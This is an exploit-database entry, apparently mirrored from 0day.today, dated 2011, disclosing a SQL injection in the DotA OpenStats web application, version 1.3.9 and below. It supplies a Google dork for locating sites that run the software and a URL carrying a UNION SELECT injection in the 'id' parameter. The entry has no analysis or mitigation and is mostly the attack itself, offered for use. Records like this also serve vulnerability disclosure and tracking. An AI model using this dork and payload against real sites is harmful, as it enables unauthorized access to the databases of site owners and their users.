id: 17284
date: 12/19/2011
title: DotA OpenStats <= 1.3.9 SQL Injection
author: HvM17
cves: 

=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP
 
=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============
 
[~] Exploit
         
        http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4
         
============
Made IN INDONESIA
Greetz for All HVM crew :)
============



#  0day.today [2023-03-25]  #